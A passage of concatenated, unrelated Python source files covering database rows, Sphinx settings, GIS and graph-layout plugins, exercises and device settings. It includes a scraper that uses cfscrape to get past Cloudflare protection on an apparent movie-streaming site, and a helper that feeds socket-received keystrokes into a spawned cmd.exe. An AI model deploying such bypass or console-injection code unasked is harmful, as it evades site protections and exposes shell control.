					cache[tfield][id] = []
				cache[tfield][id].append(row)

		return cache[tfield].get(self.id, None)

	def _matches(self, **kwargs):
		for k, v in kwargs.items():
			if not self._query(k, v):
				return False
		return True

	def _query(self, rel, value=None):
		"""
		Parse a django-like multilevel relationship
		"""
		rels = rel.split("__")
		if "" in rels: # empty string
			raise ValueError("Invalid relation string")

		first = rels[0]
		if not hasattr(self, first):
			if self._parent.environment.hasDbFile(first):
				# Handle reverse relations, eg spell__item for item table
				remainder = rel[len(first + "__"):]
				return self._get_reverse_relation(first, remainder)

			raise ValueError("Invalid relation string")

		ret = self
		rels = rels[::-1]

		special = {
			"contains": lambda x, y: x in y,
			"exact": lambda x, y: x == y,
			"icontains": lambda x, y: x.lower() in y.lower(),
			"iexact": lambda x, y: x.lower() == y.lower(),
			"gt": lambda x, y: x > y,
			"gte": lambda x, y: x >= y,
			"lt": lambda x, y: x < y,
			"lte": lambda x, y: x <= y,
		}

		while rels:
			if rels[-1] in special:
				if len(rels) != 1:
					# icontains always needs to be the last piece of the relation string
					raise ValueError("Invalid relation string")

				return special[rels[-1]](value, ret)
			else:
				ret = getattr(ret, rels.pop())

		return ret

	def _set_value(self, name, value):
		index = self.structure.index(name)
		col = self.structure[index]
		self._values[name] = col.to_python(value, self)
		self[index] = value

	def _get_value(self, name):
		if name not in self._values:
			raw_value = self[self.structure.index(name)]

			self._set_value(name, raw_value)

		return self._values[name]

	def _raw(self, name):
		"""
		Returns the raw value from field 'name'
		"""
		index = self.structure.index(name)
		return self[index]

	def _save(self):
		for name in self._values:
			index = self.structure.index(name)
			col = self.structure[index]
			self[index] = col.from_python(self._values[name])

	def _field(self, name):
		"""
		Returns the field 'name'
		"""
		index = self.structure.index(name)
		return self.structure[index]

	def _default(self):
		"""
		Change all fields to their default values
		"""
		del self[:]
		self._values = {}
		for col in self.structure:
			char = col.char
			if col.dyn:
				self.append(None)
			elif char == "s":
				self.append("")
			elif char == "f":
				self.append(0.0)
			else:
				self.append(0)


	def dict(self):
		"""
		Return a dict of the row as colname: value
		"""
		return dict(zip(self.structure.column_names, self))

	def update(self, other):
		for k in other:
			self[k] = other[k]

	@property
	def id(self):
		"Temporary hack to transition between _id and id"
		return self._id

# -*- coding: utf-8 -*-
#
# Phaser Editor documentation build configuration file, created by
# sphinx-quickstart on Thu May 25 08:35:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))


# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
	#'rinoh.frontend.sphinx'
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Phaser Editor 2D'
copyright = u'2016-2020, Arian Fornaris'
author = u'Arian Fornaris'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'2.1.7'
# The full version, including alpha/beta/rc tags.
release = u'2.1.7'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False


# -- Options for HTML output ----------------------------------------------



# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
#import sphinx_rtd_theme

html_theme = "phaser-editor"

# Uncomment for generate Eclipse Offline Help
#html_theme = "eclipse-help"

html_theme_path = ["_themes"]
html_show_sourcelink = False
html_show_sphinx = False
html_favicon = "logo.png"
html_title = "Phaser Editor Help"
html_show_copyright = True


print(html_theme_path)


#html_theme = 'classic'
highlight_language = 'javascript'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']


# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
htmlhelp_basename = 'PhaserEditordoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #
    'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    'preamble': '',

    # Latex figure (float) alignment
    #
    'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'PhaserEditor2D.tex', u'Phaser Editor 2D Documentation',
     u'Arian Fornaris', 'manual'),
]


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'PhaserEditor2D', u'Phaser Editor 2D Documentation',
     author, 'Arian', 'A friendly HTML5 game IDE.',
     'Miscellaneous'),
]




# -*- coding: utf-8 -*-

"""
***************************************************************************
    SplitRGBBands.py
    ---------------------
    Date                 : August 2012
    Copyright            : (C) 2012 by Victor Olaya
    Email                : volayaf at gmail dot com
***************************************************************************
*                                                                         *
*   This program is free software; you can redistribute it and/or modify  *
*   it under the terms of the GNU General Public License as published by  *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
***************************************************************************
"""
from processing.tools.system import *
from processing.tools import dataobjects
from processing.saga.SagaUtils import SagaUtils

__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'

from PyQt4 import QtGui
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.parameters.ParameterRaster import ParameterRaster
from processing.outputs.OutputRaster import OutputRaster
import os

class SplitRGBBands(GeoAlgorithm):

    INPUT = "INPUT"
    R = "R"
    G = "G"
    B = "B"

    def getIcon(self):
        return  QtGui.QIcon(os.path.dirname(__file__) + "/../images/saga.png")

    def defineCharacteristics(self):
        self.name = "Split RGB bands"
        self.group = "Grid - Tools"
        self.addParameter(ParameterRaster(SplitRGBBands.INPUT, "Input layer", False))
        self.addOutput(OutputRaster(SplitRGBBands.R, "Output R band layer"))
        self.addOutput(OutputRaster(SplitRGBBands.G, "Output G band layer"))
        self.addOutput(OutputRaster(SplitRGBBands.B, "Output B band layer"))

    def processAlgorithm(self, progress):
        #TODO:check correct num of bands
        input = self.getParameterValue(SplitRGBBands.INPUT)
        temp = getTempFilename(None).replace('.','');
        basename = os.path.basename(temp)
        validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        safeBasename = ''.join(c for c in basename if c in validChars)
        temp = os.path.join(os.path.dirname(temp), safeBasename)

        r = self.getOutputValue(SplitRGBBands.R)
        g = self.getOutputValue(SplitRGBBands.G)
        b = self.getOutputValue(SplitRGBBands.B)
        commands = []
        if isWindows():
            commands.append("io_gdal 0 -GRIDS \"" + temp + "\" -FILES \"" + input+"\"")
            commands.append("io_gdal 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"");
            commands.append("io_gdal 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"");
            commands.append("io_gdal 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"");
        else:
            commands.append("libio_gdal 0 -GRIDS \"" + temp + "\" -FILES \"" + input + "\"")
            commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"");
            commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"");
            commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"");

        SagaUtils.createSagaBatchJobFileFromSagaCommands(commands)
        SagaUtils.executeSaga(progress);

#!/usr/bin/python2.3

# This is the short name of the plugin, used as the menu item
# for the plugin.
# If not specified, the name of the file will be used.
shortname = "Moment Curve layout (Cohen et al. 1995)"
# This is the long name of the plugin, used as the menu note
# for the plugin.
# If not specified, the short name will be used.
name = "Moment Curve layout, O(n^3)"

DEBUG = False


def run(context, UI):
    """
    Run this plugin.
    """

    if len(context.graph.vertices) < 1:
        generate = True
    else:
        res = UI.prYesNo("Use current graph?",
                         "Would you like to apply the layout to the current graph? If not, a complete graph will be generated and the current graph cleared.")
        if res:
            generate = False
            # Go through and eliminate any existing bend points
            from graph import DummyVertex

            for v in [x for x in context.graph.vertices if isinstance(x, DummyVertex)]:
                context.graph.removeVertex(v)
        else:
            generate = True

    if generate:
        N = UI.prType("Number of Vertices", "Input number of vertices to generate complete graph:", int, 4)
        if N == None:
            return True
        while N < 0:
            N = UI.prType("Number of Vertices",
                          "Please input positive value.\n\nInput number of vertices to generate complete graph:", int,
                          N)
            if N == None:
                return True

        context.graph.clear()

        # Generate a complete graph
        k_n(context, N)

    res = UI.prYesNo("Use mod-p layout?",
                     "Would you like to use the mod-p compact layout (O(n^3) volume)? If not, the O(n^6) uncompacted layout will be used.")

    # Lay it out according to the 1bend layout
    moment(context, compact=res)

    context.camera.lookAtGraph(context.graph, context.graph.centerOfMass(), offset=context.graph.viewpoint())

    return True


def k_n(C, n):
    """
    k_n (C, n) -> void
    Create a complete graph on n vertices in context C.
    """
    from graph import Vertex, DummyVertex

    G = C.graph
    G.clear()
    # Add n vertices
    for i in range(n):
        G.addVertex(Vertex(id='%d' % i, name='v%d' % i))

    # For every pair of vertices (u, v):
    for u in G.vertices:
        for v in G.vertices:
            # ignoring duplicates and u==v
            if (u, v) not in G.edges and (v, u) not in G.edges and u != v:
                # add an edge between u and v
                G.addEdge((u, v))


def moment(C, compact=False):
    """
    Run moment curve layout (Cohen, Eades, Lin, Ruskey 1995).
    """
    G = C.graph
    from math import sqrt, ceil, floor
    from graph import DummyVertex, GraphError
    import colorsys


    vertices = [x for x in G.vertices if not isinstance(x, DummyVertex)]
    n = len(vertices)

    # Choose a prime p with n < p <= 2n
    for p in range(n + 1, 2 * n + 1):
        for div in range(2, p / 2):
            if p % div == 0:
                # print "%d is not a prime (div by %d)" % (p, div)
                break
        else:
            # We did not find a divisor
            # print "%d is a prime!" % p
            break
    else:
        # Can't happen!
        raise Exception, "Can't find a prime between %d and %d!" % (n + 1, 2 * n)

    # Position each vertex

    if compact:
        for i in range(n):
            G.modVertex(vertices[i]).pos = (i * 10, ((i * i) % p) * 10, ((i * i * i) % p) * 10)
    else:
        for i in range(n):
            G.modVertex(vertices[i]).pos = (i, (i * i), (i * i * i))

    return

# -*- coding: utf-8 -*-

#  ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
#  .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
#  .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
#  .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
#  .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
#  .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
#  ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.

'''
    OpenScrapers Project
    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
'''

import re

from openscrapers.modules import cleantitle, source_utils, cfscrape


class source:
    def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['coolmoviezone.online']
        self.base_link = 'https://coolmoviezone.online'
        self.scraper = cfscrape.create_scraper()

    def movie(self, imdb, title, localtitle, aliases, year):
        try:
            title = cleantitle.geturl(title)
            url = self.base_link + '/%s-%s' % (title, year)
            return url
        except:
            return

    def sources(self, url, hostDict, hostprDict):
        try:
            sources = []
            r = self.scraper.get(url).content
            match = re.compile('<td align="center"><strong><a href="(.+?)"').findall(r)
            for url in match:
                host = url.split('//')[1].replace('www.', '')
                host = host.split('/')[0].split('.')[0].title()
                quality = source_utils.check_sd_url(url)
                sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False,
                                'debridonly': False})
        except Exception:
            return
        return sources

    def resolve(self, url):
        return url

'''
Ohm's law is a simple equation describing electrical circuits. It
states that the voltage V through a resistor is equal to the current
(I) times the resistance:

V = I * R

The units of these are volts, ampheres (or "amps"), and ohms,
respectively. In real circuits, often R is actually measured in
kiloohms (10**3 ohms) and I in milliamps (10**-3 amps).

Let's create a Resistor class that models this behavior. The
constructor takes two arguments - the resistance in ohms, and the
voltage in volts:

>>> resistor = Resistor(800, 5.5)
>>> resistor.resistance
800
>>> resistor.voltage
5.5

The current is derived from these two using Ohm's law:
(Hint: use @property)

>>> resistor.current
0.006875

Since we may want the value in milliamps, let's make another property
to provide that:

>>> resistor.current_in_milliamps
6.875

Let's set it up so that we can change the current, and doing so will
correspondingly modify the voltage (but keep the resistance constant).

>>> resistor.current_in_milliamps = 3.5
>>> resistor.resistance
800
>>> round(resistor.voltage, 2)
2.8
>>> resistor.current = .006875
>>> round(resistor.voltage, 2)
5.5
>>> resistor.resistance
800

Also, we've made a design decision that a Resistor cannot change its
resistance value once created:

>>> resistor.resistance = 8200
Traceback (most recent call last):
AttributeError: can't set attribute

'''

# Write your code here:

class Resistor:
    def __init__(self, resistance, voltage):
        self._resistance = resistance
        self.voltage = voltage

    @property
    def resistance(self):
        return self._resistance

    @property
    def current(self):
        return self.voltage / self.resistance

    @current.setter
    def current(self, value):
        self.voltage = self.resistance * value

    @property
    def current_in_milliamps(self):
        return self.current * 1000

    @current_in_milliamps.setter
    def current_in_milliamps(self, value):
        self.current = value / 1000

# Do not edit any code below this line!

if __name__ == '__main__':
    import doctest
    count, _ = doctest.testmod()
    if count == 0:
        print('*** ALL TESTS PASS ***\nGive someone a HIGH FIVE!')

# Copyright 2015-2018 Aaron Maxwell. All rights reserved.

# coding=utf-8
# ---------------------------------------------------------------
# Desenvolvedor:    Arannã Sousa Santos
# Mês:              12
# Ano:              2015
# Projeto:          pagseguro_xml
# e-mail:           asousas@live.com
# ---------------------------------------------------------------

import logging
from pagseguro_xml.notificacao import ApiPagSeguroNotificacao_v3, CONST_v3


logger = logging.basicConfig(level=logging.DEBUG)


PAGSEGURO_API_AMBIENTE = u'sandbox'
PAGSEGURO_API_EMAIL = u'seu@email.com'
PAGSEGURO_API_TOKEN_PRODUCAO = u''
PAGSEGURO_API_TOKEN_SANDBOX = u''


CHAVE_NOTIFICACAO = u'AA0000-AA00A0A0AA00-AA00AA000000-AA0000'      # ela éh de producao


api = ApiPagSeguroNotificacao_v3(ambiente=CONST_v3.AMBIENTE.SANDBOX)
PAGSEGURO_API_TOKEN = PAGSEGURO_API_TOKEN_PRODUCAO


ok, retorno = api.consulta_notificacao_transacao_v3(PAGSEGURO_API_EMAIL, PAGSEGURO_API_TOKEN, CHAVE_NOTIFICACAO)

if ok:

    print u'-' * 50
    print retorno.xml
    print u'-' * 50

    for a in retorno.alertas:
        print a

else:
    print u'Motivo do erro:', retorno


#
#
# (C) Copyright 2001 The Internet (Aust) Pty Ltd
# ACN: 082 081 472  ABN: 83 082 081 472
# All Rights Reserved
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# Author: Andrew Milton <akm@theinternet.com.au>
# $Id: Plugins.py,v 1.5 2004/11/10 14:15:33 akm Exp $

import App, Globals, OFS
import string
import time

from Globals import ImageFile, HTMLFile, HTML, MessageDialog, package_home
from OFS.Folder import Folder

class PluginRegister:
	def __init__(self, name, description, pluginClass,
				 pluginStartForm, pluginStartMethod,
				 pluginEditForm=None, pluginEditMethod=None):
		self.name=name #No Spaces please...
		self.description=description
		self.plugin=pluginClass
		self.manage_addForm=pluginStartForm
		self.manage_addMethod=pluginStartMethod
		self.manage_editForm=pluginEditForm
		self.manage_editMethod=pluginEditMethod

class CryptoPluginRegister:
	def __init__(self, name, crypto, description, pluginMethod):
		self.name = name #No Spaces please...
		self.cryptoMethod = crypto 
		self.description = description
		self.plugin = pluginMethod

#!/usr/bin/python
"feed fetcher"

from db import MySQLDatabase
from fetcher import FeedFetcher

def main():
    db = MySQLDatabase()
    fetcher = FeedFetcher()

    feeds = db.get_feeds(offset=0, limit=10)
    read_count = 10
    while len(feeds) > 0:
        for feed in feeds:
            fid = feed[0]
            url = feed[1]
            title = feed[2]
            print "fetching #{0}: {1}".format(fid, url)
            entries = fetcher.fetch(url)
            for entry in entries:
                entry.feed_id = fid
                try:
                    print "insert {0}".format(entry.url)
                except UnicodeEncodeError:
                    print "insert {0}".format(entry.url.encode('utf-8'))
                db.append_feed_content(entry)
        feeds = db.get_feeds(offset=read_count, limit=10)
        read_count += 10

if __name__ == '__main__':
    main()

# จงเขียนโปรแกรมแสดงเลขคู่ในช่วง 0 ถึง 10 (รวม 10 ด้วย)
for i in range(11):
    if (i % 2 == 0):
        print(i)
#!/usr/bin/env python

import math


fin = open('figs/single-rod-in-water.dat', 'r')
fout = open('figs/single-rods-calculated-density.dat', 'w')

kB = 3.16681539628059e-6 # This is Boltzmann's constant in Hartree/Kelvin
first = 1
nm = 18.8972613

for line in fin:
    current = str(line)
    pieces = current.split('\t')
    if first:
        r2 = float(pieces[0])/2*nm
        E2 = float(pieces[1])
        first = 0
    else:
        if ((float(pieces[0])/2*nm - r2) > 0.25):
            r1 = r2
            r2 = float(pieces[0])/2*nm
            E1 = E2
            E2 = float(pieces[1]) # actually it's energy per unit length!
            length = 1 # arbitrary
            r = (r1 + r2)/2
            dEdR = (E2-E1)/(r2-r1)*length
            area = 2*math.pi*r*length
            force = dEdR
            pressure = force/area
            kT = kB*298 # about this
            ncontact = pressure/kT
            fout.write(str(r)+'\t'+str(ncontact)+'\n')

fin.close()
fout.close()

import win32pipe
import win32console
import win32process
import time
import win32con
import codecs
import ctypes 
user32 = ctypes.windll.user32

CONQUE_WINDOWS_VK = {
    '3'  : win32con.VK_CANCEL,
    '8'  : win32con.VK_BACK,
    '9'  : win32con.VK_TAB,
    '12' : win32con.VK_CLEAR,
    '13' : win32con.VK_RETURN,
    '17' : win32con.VK_CONTROL,
    '20' : win32con.VK_CAPITAL,
    '27' : win32con.VK_ESCAPE,
    '28' : win32con.VK_CONVERT,
    '35' : win32con.VK_END,
    '36' : win32con.VK_HOME,
    '37' : win32con.VK_LEFT,
    '38' : win32con.VK_UP,
    '39' : win32con.VK_RIGHT,
    '40' : win32con.VK_DOWN,
    '45' : win32con.VK_INSERT,
    '46' : win32con.VK_DELETE,
    '47' : win32con.VK_HELP
}

def make_input_key(c, control_key_state=None):
    kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT)
    kc.KeyDown = True
    kc.RepeatCount = 1
    cnum = ord(c)
    if cnum == 3:
        pid_list = win32console.GetConsoleProcessList()
        win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0)
        return 
    else:
        kc.Char = unicode(c)
        if str(cnum) in CONQUE_WINDOWS_VK:
            kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)]
        else:
            kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum)
            #kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96)
            #kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED

    return kc


#win32console.AttachConsole()
coord = win32console.PyCOORDType

con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)

flags = win32process.NORMAL_PRIORITY_CLASS
si = win32process.STARTUPINFO()
si.dwFlags |= win32con.STARTF_USESHOWWINDOW

(handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si)
time.sleep(1)
#size = con_stdout.GetConsoleScreenBufferInfo()['Window']
# with codecs.open("log.txt", "w", "utf8") as f:
	# for i in xrange(0, size.Bottom):
		# f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i)))
		# f.write("\n")


import socket 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 5554

s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)

(sc, scname) = s.accept()
while True:
    msg = sc.recv(1)
    if ord(msg) == 0:
        break
    keys = [make_input_key(msg)]
    if keys:
        con_stdin.WriteConsoleInput(keys)


win32process.TerminateProcess(handle1, 0)
import urllib2
import appuifw, e32
from key_codes import *


class Drinker(object):
    def __init__(self):
        self.id = 0
        self.name = ""
        self.prom = 0.0
        self.idle = ""
        self.drinks = 0


def get_drinker_list():
    data = urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/get_datas/").read().split("\n")
    drinkers = []

    for data_row in data:
        if data_row == '': continue

        fields = data_row.split('|')

        drinker = Drinker()
        drinker.id = int(fields[0])
        drinker.name = fields[1]
        drinker.drinks = int(fields[2])
        drinker.prom = float(fields[3])
        drinker.idle = fields[4]

        drinkers.append(drinker)

    return drinkers


def get_listbox_items(drinkers):
    items = []

    for drinker in drinkers:
        items.append(unicode('%s, %d drinks, %s' % (drinker.name, drinker.drinks, drinker.idle)))

    return items


appuifw.app.title = u"Alkoholilaskuri"

app_lock = e32.Ao_lock()

#Define the exit function 
def quit():
        app_lock.signal()

appuifw.app.exit_key_handler = quit

drinkers = get_drinker_list()
items = get_listbox_items(drinkers)


#Define a function that is called when an item is selected
def handle_selection():
    selected_drinker = drinkers[lb.current()]
    urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/add_drink/%d/" % (selected_drinker.id))
    appuifw.note(u"A drink has been added to " + drinkers[lb.current()].name, 'info')

    new_drinkers = get_drinker_list()
    items = get_listbox_items(new_drinkers)

    lb.set_list(items, lb.current())


#Create an instance of Listbox and set it as the application's body
lb = appuifw.Listbox(items, handle_selection)
appuifw.app.body = lb
 
app_lock.wait()

from config import config, ConfigSlider, ConfigSelection, ConfigYesNo, \
	ConfigEnableDisable, ConfigSubsection, ConfigBoolean, ConfigSelectionNumber, ConfigNothing, NoSave
from enigma import eAVSwitch, getDesktop
from SystemInfo import SystemInfo
from os import path as os_path

class AVSwitch:
	def setInput(self, input):
		INPUT = { "ENCODER": 0, "SCART": 1, "AUX": 2 }
		eAVSwitch.getInstance().setInput(INPUT[input])

	def setColorFormat(self, value):
		eAVSwitch.getInstance().setColorFormat(value)

	def setAspectRatio(self, value):
		eAVSwitch.getInstance().setAspectRatio(value)

	def setSystem(self, value):
		eAVSwitch.getInstance().setVideomode(value)

	def getOutputAspect(self):
		valstr = config.av.aspectratio.value
		if valstr in ("4_3_letterbox", "4_3_panscan"): # 4:3
			return (4,3)
		elif valstr == "16_9": # auto ... 4:3 or 16:9
			try:
				aspect_str = open("/proc/stb/vmpeg/0/aspect", "r").read()
				if aspect_str == "1": # 4:3
					return (4,3)
			except IOError:
				pass
		elif valstr in ("16_9_always", "16_9_letterbox"): # 16:9
			pass
		elif valstr in ("16_10_letterbox", "16_10_panscan"): # 16:10
			return (16,10)
		return (16,9)

	def getFramebufferScale(self):
		aspect = self.getOutputAspect()
		fb_size = getDesktop(0).size()
		return (aspect[0] * fb_size.height(), aspect[1] * fb_size.width())

	def getAspectRatioSetting(self):
		valstr = config.av.aspectratio.value
		if valstr == "4_3_letterbox":
			val = 0
		elif valstr == "4_3_panscan":
			val = 1
		elif valstr == "16_9":
			val = 2
		elif valstr == "16_9_always":
			val = 3
		elif valstr == "16_10_letterbox":
			val = 4
		elif valstr == "16_10_panscan":
			val = 5
		elif valstr == "16_9_letterbox":
			val = 6
		return val

	def setAspectWSS(self, aspect=None):
		if not config.av.wss.value:
			value = 2 # auto(4:3_off)
		else:
			value = 1 # auto
		eAVSwitch.getInstance().setWSS(value)

def InitAVSwitch():
	config.av = ConfigSubsection()
	config.av.yuvenabled = ConfigBoolean(default=False)
	colorformat_choices = {"cvbs": _("CVBS"), "rgb": _("RGB"), "svideo": _("S-Video")}
	
	# when YUV is not enabled, don't let the user select it
	if config.av.yuvenabled.value:
		colorformat_choices["yuv"] = _("YPbPr")
#	ikseong
	config.av.colorformat = ConfigSelection(choices=colorformat_choices, default="cvbs")
	config.av.aspectratio = ConfigSelection(choices={
			"4_3_letterbox": _("4:3 Letterbox"),
			"4_3_panscan": _("4:3 PanScan"), 
			"16_9": _("16:9"), 
			"16_9_always": _("16:9 always"),
			"16_10_letterbox": _("16:10 Letterbox"),
			"16_10_panscan": _("16:10 PanScan"), 
			"16_9_letterbox": _("16:9 Letterbox")}, 
			default = "4_3_letterbox")

	config.av.aspect = ConfigSelection(choices={
			"4_3": _("4:3"),
			"16_9": _("16:9"), 
			"16_10": _("16:10"),
			"auto": _("Automatic")},
			default = "auto")
	config.av.policy_169 = ConfigSelection(choices={
				# TRANSLATORS: (aspect ratio policy: black bars on top/bottom) in doubt, keep english term.
			"letterbox": _("Letterbox"), 
				# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
			"panscan": _("Pan&Scan"),  
				# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
			"scale": _("Just Scale")},
			default = "letterbox")
	config.av.policy_43 = ConfigSelection(choices={
				# TRANSLATORS: (aspect ratio policy: black bars on left/right) in doubt, keep english term.
			"pillarbox": _("Pillarbox"), 
				# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
			"panscan": _("Pan&Scan"),  
				# TRANSLATORS: (aspect ratio policy: display as fullscreen, with stretching the left/right)
			"nonlinear": _("Nonlinear"),  
				# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
			"scale": _("Just Scale")},
			default = "pillarbox")
	config.av.tvsystem = ConfigSelection(choices = {"pal": _("PAL"), "ntsc": _("NTSC"), "multinorm": _("multinorm")}, default="pal")
	config.av.wss = ConfigEnableDisable(default = True)
	config.av.defaultac3 = ConfigYesNo(default = False)
	config.av.generalAC3delay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
	config.av.generalPCMdelay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
	config.av.vcrswitch = ConfigEnableDisable(default = False)

	iAVSwitch = AVSwitch()

	def setColorFormat(configElement):
		map = {"cvbs": 0, "rgb": 1, "svideo": 2, "yuv": 3}
		iAVSwitch.setColorFormat(map[configElement.value])

	def setAspectRatio(configElement):
		map = {"4_3_letterbox": 0, "4_3_panscan": 1, "16_9": 2, "16_9_always": 3, "16_10_letterbox": 4, "16_10_panscan": 5, "16_9_letterbox" : 6}
		iAVSwitch.setAspectRatio(map[configElement.value])

	def setSystem(configElement):
		map = {"pal": 0, "ntsc": 1, "multinorm" : 2}
		iAVSwitch.setSystem(map[configElement.value])

	def setWSS(configElement):
		iAVSwitch.setAspectWSS()

	# this will call the "setup-val" initial
	config.av.colorformat.addNotifier(setColorFormat)
	config.av.aspectratio.addNotifier(setAspectRatio)
	config.av.tvsystem.addNotifier(setSystem)
	config.av.wss.addNotifier(setWSS)

	iAVSwitch.setInput("ENCODER") # init on startup
	SystemInfo["ScartSwitch"] = eAVSwitch.getInstance().haveScartSwitch()

	try:
		can_downmix = open("/proc/stb/audio/ac3_choices", "r").read()[:-1].find("downmix") != -1
	except:
		can_downmix = False

